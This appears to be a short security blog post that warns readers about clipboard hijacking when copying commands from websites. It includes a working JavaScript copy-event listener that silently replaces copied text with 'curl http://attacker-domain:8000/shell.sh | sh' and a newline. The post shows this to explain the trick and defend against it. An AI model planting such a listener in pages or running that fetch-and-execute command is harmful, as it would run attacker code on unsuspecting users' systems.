Skip to content

Tony Perez

Tony Perez

  • Home
  • Posts
  • Tools
    • Palworld Progress Tracker
    • Currency Converter
    • Hex to RGB Converter
    • Weight Converter
    • Word & Character Count
  • Ultra Fast UK Web Hosting
  • Home
  • Posts
  • Tools
    • Palworld Progress Tracker
    • Currency Converter
    • Hex to RGB Converter
    • Weight Converter
    • Word & Character Count
  • Ultra Fast UK Web Hosting
Quick Reads
  • Bypass Radio Garden Block In The UK
  • How To Play OSRS In Fullscreen (RuneLite)
  • How To Export Your Amazon Orders To Excel
  • Automatically Post OSRS Notifications To Discord
  • How To Add Image Borders To Ivanti Knowledge Base Articles
  • How To Fix Fishing Bug in Palia
  • New Microsoft Teams Suddenly Crashing During Calls or Meetings
  • How To Find Full Network Path Of Mapped Drive
  • Quick Guide to Restore Corrupt World Save in Palworld
  • Palworld Progress Tracker – 300+ Completionist Achievements
  • How To Save Existing Table Style In Microsoft Word
  • CSM Option Greyed Out in BIOS
  • Orange DRAM Light, No Display
  • Fix Fire Stick Bluetooth Audio Delay (Alexa)
  • How To Pause Task Manager
  • OW2 Fix: Health Bars Disappeared While Healing
  • Outlook Automatically Creates Teams Meeting When Inviting Attendees
  • Alexa Fix: ‘Make Sure Your Devices Are On The Same Wi-Fi Network’
  • Office Applications Freezing When Making Formatting Changes
  • External SharePoint Verification Code Email Not Received
Home>Guide>Security>Why You Should Never Copy & Paste Commands
Security

Why You Should Never Copy & Paste Commands

Tony
January 24, 2022

Let’s say you come across a website with a helpful command, so you copy this to paste into a console/terminal to save some time typing it out. Smart move, right?

Well, no, probably not. Visit this website and copy the sudo apt update text and then paste it into the box below on that site. It will instead paste: curl http://attacker-domain:8000/shell.sh | sh and then immediately add a new line, which will automatically perform the command.

How this works is a JavaScript event listener captures the copy event and then replaces the clipboard data with the malicious code, as below:

<script>
document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl http://attacker-domain:8000/shell.sh | sh\n'); e.preventDefault(); });
</script>

In conclusion, always be careful when copying code that you find online. When in doubt, paste it into Notepad or your URL bar first to confirm it is not malicious.

Related Articles

Ultimate Windows Privacy Resources Security

The Ultimate Windows Privacy Resource

Latest Posts

  • Bypass Radio Garden Block In The UK
  • How To Play OSRS In Fullscreen (RuneLite)
  • How To Export Your Amazon Orders To Excel
  • Automatically Post OSRS Notifications To Discord
  • How To Add Image Borders To Ivanti Knowledge Base Articles
  • How To Fix Fishing Bug in Palia
  • New Microsoft Teams Suddenly Crashing During Calls or Meetings
© 2025 Tony Perez | WordPress Theme Ultra Lite